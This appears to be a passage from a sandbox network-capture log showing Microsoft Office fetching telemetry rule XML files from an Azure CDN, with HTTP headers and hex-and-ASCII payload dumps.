                              2024-11-29 14:59:28 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                              Session IDSource IPSource PortDestination IPDestination Port
                              57192.168.2.44980513.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:29 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:29 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:29 GMT
                              Content-Type: text/xml
                              Content-Length: 468
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                              ETag: "0x8DC582BB046B576"
                              x-ms-request-id: c473f14b-c01e-00a2-5a07-412327000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145929Z-174f7845968n2hr8hC1EWR9cag0000000zr0000000009trr
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:29 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              58192.168.2.44980613.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:29 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:30 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:30 GMT
                              Content-Type: text/xml
                              Content-Length: 400
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                              ETag: "0x8DC582BB2D62837"
                              x-ms-request-id: 6760f0bc-801e-002a-1f91-3f31dc000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145930Z-174f7845968j6t2phC1EWRcfe8000000108g0000000078ye
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:30 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                              Session IDSource IPSource PortDestination IPDestination Port
                              59192.168.2.44980713.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:30 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:30 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:30 GMT
                              Content-Type: text/xml
                              Content-Length: 479
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                              ETag: "0x8DC582BB7D702D0"
                              x-ms-request-id: 26935917-f01e-0003-011b-414453000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145930Z-174f7845968xlwnmhC1EWR0sv80000000zzg0000000048c7
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:30 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              60192.168.2.44980813.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:30 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:30 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:30 GMT
                              Content-Type: text/xml
                              Content-Length: 425
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                              ETag: "0x8DC582BBA25094F"
                              x-ms-request-id: 34632f50-601e-0097-1466-40f33a000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145930Z-174f7845968psccphC1EWRuz9s00000010d0000000003r2s
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:30 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                              Session IDSource IPSource PortDestination IPDestination Port
                              61192.168.2.44980913.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:31 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:31 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:31 GMT
                              Content-Type: text/xml
                              Content-Length: 475
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                              ETag: "0x8DC582BB2BE84FD"
                              x-ms-request-id: e4738428-701e-006f-2050-41afc4000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145931Z-174f7845968pght8hC1EWRyvxg000000034g00000000e4p2
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:31 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              62192.168.2.44981013.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:32 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:32 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:32 GMT
                              Content-Type: text/xml
                              Content-Length: 448
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                              ETag: "0x8DC582BB389F49B"
                              x-ms-request-id: c6635303-801e-0083-091e-41f0ae000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145932Z-174f7845968jrjrxhC1EWRmmrs000000106g000000009qqu
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:32 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                              Session IDSource IPSource PortDestination IPDestination Port
                              63192.168.2.44981113.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:32 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:32 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:32 GMT
                              Content-Type: text/xml
                              Content-Length: 491
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                              ETag: "0x8DC582B98B88612"
                              x-ms-request-id: 5cf18591-601e-000d-7e91-3f2618000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145932Z-174f78459685726chC1EWRsnbg000000106g00000000498a
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:32 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              64192.168.2.44981213.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:32 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:33 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:32 GMT
                              Content-Type: text/xml
                              Content-Length: 416
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                              ETag: "0x8DC582BAEA4B445"
                              x-ms-request-id: 77a0d04a-d01e-0082-5d28-41e489000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145932Z-174f7845968frfdmhC1EWRxxbw000000101000000000ebpy
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:33 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                              Session IDSource IPSource PortDestination IPDestination Port
                              65192.168.2.44981313.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:33 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:34 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:33 GMT
                              Content-Type: text/xml
                              Content-Length: 479
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                              ETag: "0x8DC582B989EE75B"
                              x-ms-request-id: a70bbc6a-401e-0029-780b-419b43000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145933Z-174f7845968frfdmhC1EWRxxbw000000108000000000086g
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:34 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              66192.168.2.44981413.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:34 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:34 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:34 GMT
                              Content-Type: text/xml
                              Content-Length: 415
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                              ETag: "0x8DC582BA80D96A1"
                              x-ms-request-id: b24172ee-901e-0016-3789-3fefe9000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145934Z-174f7845968glpgnhC1EWR7uec000000107g00000000a0a8
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:34 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                              Session IDSource IPSource PortDestination IPDestination Port
                              67192.168.2.44981513.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:34 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:34 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:34 GMT
                              Content-Type: text/xml
                              Content-Length: 471
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                              ETag: "0x8DC582B97E6FCDD"
                              x-ms-request-id: c6f16635-c01e-0034-4354-402af6000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145934Z-174f7845968pf68xhC1EWRr4h800000010e0000000001bsz
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:34 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              68192.168.2.44981613.107.246.63443
                              TimestampBytes transferredDirectionData
